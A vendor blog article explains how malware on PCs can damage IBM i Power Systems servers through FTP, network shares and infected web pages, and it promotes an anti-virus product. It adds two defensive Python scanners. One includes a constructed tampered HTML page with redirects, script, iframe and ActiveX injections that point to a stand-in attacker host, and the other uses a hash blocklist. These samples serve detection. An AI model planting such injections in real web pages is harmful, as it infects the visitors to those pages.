
Advanced Malware and Your Power Systems Server

IBM i
Posted:
March 9, 2017

 

There are many different types of malware, including bots, worms, trojans, and viruses, and the campaigns that deliver them range from mass nuisance infections to advanced persistent threats (APTs). While the traditional types are still menacing, the recent, most advanced threats are the ones to worry about.

Advanced malware is new, hard to detect, and built for profit rather than mischief, and you usually learn of it only after the attack has succeeded. Traditional attacks, by contrast, are already "known" and can be blocked from the start by a signature. Traditional defenses are still necessary, but they are unlikely to block these new threats on their own, so additional protection is needed.

Another characteristic of advanced malware is its zero-day or targeted nature. Because such a sample is not yet widespread, there is usually no signature for it, so a signature-based scanner cannot recognize it, and your organization may be the first, and only, target it is ever aimed at.

The threat landscape is constantly changing, so the rules (and the necessity) for including your IBM Power Systems server in your corporate malware guidelines have changed, too. If you use IBM Power Systems as a file server, your strategy must evolve. Enterprises must increase their vigilance to protect themselves from advanced malware.

Yet many administrators still do not see their IBM servers as being at risk. They hold the traditional view of a virus as something that executes on a specific operating system. It may be true that most malware exploits flaws in Microsoft Windows, but it would be a mistake to conclude that only a Windows PC can be harmed. Malware does not need to execute on IBM i, or even to target it, in order to wreak havoc on your operations.

If a Windows PC is infected and it has a connection to your Power server (a mapped NetServer share, an ODBC or FTP session, credentials saved in an application), the malware can perform any action that the connected user profile is authorized to perform. Files on your IBM servers can be deleted, settings can be changed, objects can be modified, and if the profile has enough authority, the server itself can be shut down. The blast radius is set by the authority of the connected user, not by the operating system the malware runs on.

Consider denial-of-service (DoS) attacks. These occur when a virus or malicious program running on an infected host overwhelms Power Systems services such as FTP, DNS, or Telnet. IBM has documented several APARs that deal with DoS attacks, and viruses have been known to take down the Telnet server. On an IBM i server that has a very serious effect: interactive 5250 sessions come in through the Telnet server, so no one would be signing on at that point.

Let's look at a very common source of infection for IBM Power Systems: the FTP server. It is built into IBM i, and most of you are using it in some way (for administration or to share files with business partners or customers). Unfortunately, the FTP server will gladly allow infected files to be uploaded and downloaded. From a PC, the PUT command at a command prompt copies a file, regardless of its content, to any directory in the integrated file system that the user profile can write to; the server checks the user's authority, not what is in the file. Another FTP weakness is users saving files to the system with the Save As option in their applications. Once an FTP location is defined within an application, often with the password stored, no subsequent logon is required, which creates a potentially dangerous situation: any malware sitting on that PC can use the saved connection.

Recent malware trends show that most attacks are browser-based. Web pages are a common place for threats to hide and spread to the PC of anyone who views them. Malware can alter the HTML files to redirect a visitor to a different page, the page of the attacker's choosing. It can also insert ActiveX code that will run on a user's computer. Viruses have even modified JPEG files to exploit vulnerabilities in Internet Explorer. The net effect is this: if a web page that you serve from the IBM i HTTP server has been infected, and that page is viewed by a customer, a business partner, or an internal user, those PCs can become infected, too.
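One way to catch the page tampering described above is to check each HTML file against a known-good hash and, independently, look for the injection patterns themselves: off-site redirects, ActiveX objects, and script or iframe includes that pull content from another host. The following is an added example, not code from the article or from any vendor product; the trusted host name, the two sample pages, and the `attacker.invalid` host are constructed for illustration.

```python
"""Scan HTML files (for example, pages exported from the document root that the
IBM i HTTP server serves from the integrated file system) for injected content.
Added example; trusted host and sample pages are constructed."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"www.example.com"}   # assumption: the site's own host name(s)

# Inline JavaScript that sends the visitor to another site.
REDIRECT_JS = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)", re.I)


class InjectionFinder(HTMLParser):
    """Collect (kind, target) pairs for suspicious tags while parsing a page."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = {h.lower() for h in trusted}
        self.findings = []
        self._in_script = False

    def _offsite(self, url):
        host = urlparse(url.strip()).hostname
        return host is not None and host.lower() not in self.trusted

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # <meta http-equiv="refresh" content="0;url=http://...">
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m and self._offsite(m.group(1)):
                self.findings.append(("meta-refresh", m.group(1)))
        if tag in ("script", "iframe", "embed") and a.get("src") and self._offsite(a["src"]):
            self.findings.append((tag + "-offsite-src", a["src"]))
        if tag == "script":
            self._in_script = True
        if tag == "object" and a.get("classid", "").lower().startswith("clsid:"):
            self.findings.append(("activex-object", a["classid"]))
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style or a.get("width") == "0":
                self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for url in REDIRECT_JS.findall(data):
                if self._offsite(url):
                    self.findings.append(("inline-redirect", url))


def scan_html(text, trusted=TRUSTED_HOSTS):
    """Return the list of (kind, target) findings for one page."""
    p = InjectionFinder(trusted)
    p.feed(text)
    p.close()
    return p.findings


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def page_report(text, baseline_sha256, trusted=TRUSTED_HOSTS):
    """Integrity check against a known-good hash plus the pattern scan: a page
    that differs from baseline deserves a look even when the scan finds nothing."""
    return {"modified": sha256_text(text) != baseline_sha256,
            "findings": scan_html(text, trusted)}


# Constructed sample pages. ".invalid" is a reserved TLD, so nothing resolves.
CLEAN_PAGE = """<html><head><title>Order status</title>
<script src="/js/app.js"></script>
<script src="https://www.example.com/js/vendor.js"></script></head>
<body><p>Welcome back.</p></body></html>"""

TAMPERED_PAGE = """<html><head><title>Order status</title>
<meta http-equiv="refresh" content="0;url=http://attacker.invalid/login">
<script src="http://attacker.invalid/drop.js"></script>
<script>document.location.href = "http://attacker.invalid/x";</script></head>
<body><p>Welcome back.</p>
<object classid="clsid:00000000-0000-0000-0000-000000000000" codebase="http://attacker.invalid/a.cab"></object>
<iframe src="http://attacker.invalid/i" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    baseline = sha256_text(CLEAN_PAGE)
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, page_report(page, baseline))
```

The hash check is the stronger control, because it flags any change, including injections this pattern list does not know about; the pattern scan is there to tell you quickly what kind of change you are looking at. Keep the baseline hashes somewhere the web server's user profile cannot write.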

There are many ways to receive malware, and closing off your Power server to incoming web traffic will not protect you. Other ways to get infected include:

  • Someone inside the firewall downloads something from the internet
  • CDs, DVDs, floppy disks, USB drives, and other removable media
  • Laptops or wireless devices
  • Email
  • VPNs
  • File sharing

All of these are possible avenues to be exploited, so you must protect against malware on the Power Systems server itself, not only at the perimeter. Luckily, you can take immediate action and implement a native anti-virus package on your Power server that scans your directories for viruses. IBM i provides integrated file system scanning exit points (QIBM_QP0L_SCAN_OPEN and QIBM_QP0L_SCAN_CLOSE), controlled by the QSCANFS and QSCANFSCTL system values, so that files are scanned when they are opened or closed and scanned again after they change. Stand Guard Anti-Virus uses this IBM-supported on-access scanning to stop a virus from spreading. Try it free today!
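The two points above, that FTP accepts any content regardless of the file name, and that on-access scanning marks a file clean and rescans it only after it changes, can be shown with an offline scan of a directory tree such as a copy of an IFS share. This is an added example, not the article's code and not Stand Guard Anti-Virus; the blocklist hash, the sample files, and the temporary "share" are constructed so the script runs stand-alone.

```python
"""Offline directory scan with change-only rescanning, in the spirit of the IBM i
scan-on-open/scan-on-close behaviour. Added example; blocklist and sample files
are constructed here."""
import hashlib
import os
import shutil
import tempfile

# Constructed blocklist: the SHA-256 of a sample created in demo(), standing in
# for a signature database (real scanners use far more than a hash list).
KNOWN_BAD_CONTENT = b"constructed-dropper-payload-v1\n"
BLOCKLIST = {hashlib.sha256(KNOWN_BAD_CONTENT).hexdigest()}

# Executable formats that must never hide behind a data-file extension.
EXECUTABLE_MAGIC = {b"MZ": "pe", b"\x7fELF": "elf", b"#!": "script"}
DATA_EXTENSIONS = {".txt", ".csv", ".pdf", ".jpg", ".jpeg", ".png", ".xml", ".dat"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(path):
    """Return None if the file looks clean, otherwise a reason string."""
    with open(path, "rb") as f:
        head = f.read(4)
    ext = os.path.splitext(path)[1].lower()
    for magic, kind in EXECUTABLE_MAGIC.items():
        if head.startswith(magic) and ext in DATA_EXTENSIONS:
            return f"{kind}-executable-as-{ext}"   # e.g. a PE uploaded as invoice.pdf
    if sha256_file(path) in BLOCKLIST:
        return "blocklisted-hash"
    return None


class ScanCache:
    """Per-object 'scanned' status: a file whose size and mtime are unchanged
    since its last clean result is skipped, like QSCANFS *ROOTOPNUD scanning
    on open and again after an update."""

    def __init__(self):
        self.clean = {}   # path -> (size, mtime_ns)

    def needs_scan(self, path):
        st = os.stat(path)
        return self.clean.get(path) != (st.st_size, st.st_mtime_ns)

    def mark_clean(self, path):
        st = os.stat(path)
        self.clean[path] = (st.st_size, st.st_mtime_ns)


def scan_tree(root, cache):
    """Walk root; return ({path: reason} for flagged files, count actually scanned)."""
    flagged, scanned = {}, 0
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not cache.needs_scan(path):
                continue
            scanned += 1
            reason = classify(path)
            if reason:
                flagged[path] = reason      # never marked clean: rescanned every pass
            else:
                cache.mark_clean(path)
    return flagged, scanned


def _write(path, data):
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed share: a clean CSV, a PE renamed to .pdf (an FTP PUT would
    accept it happily) and a blocklisted file. Returns three scan results so
    the change-only behaviour is visible."""
    root = tempfile.mkdtemp(prefix="ifs-share-")
    try:
        os.makedirs(os.path.join(root, "orders"))
        _write(os.path.join(root, "orders", "june.csv"), b"id,amount\n1,20.00\n")
        _write(os.path.join(root, "orders", "invoice.pdf"), b"MZ\x90\x00" + b"\x00" * 60)
        _write(os.path.join(root, "update.exe"), KNOWN_BAD_CONTENT)
        cache = ScanCache()
        first = scan_tree(root, cache)     # all three files scanned
        second = scan_tree(root, cache)    # only the two flagged files rescanned
        with open(os.path.join(root, "orders", "june.csv"), "ab") as f:
            f.write(b"2,35.00\n")          # modified: must be scanned again
        third = scan_tree(root, cache)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return first, second, third


if __name__ == "__main__":
    for label, (flagged, n) in zip(("first", "second", "third"), demo()):
        print(label, "scanned", n, "flagged", sorted(flagged.values()))
```

The point of the cache is the same one the IBM i scan attributes make: scanning on every open is expensive, but skipping a file forever is unsafe, so the scanner keys the clean result on the file's identity and modification state and re-examines anything that changes. A production scanner would also rescan everything when its signatures are updated.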

 
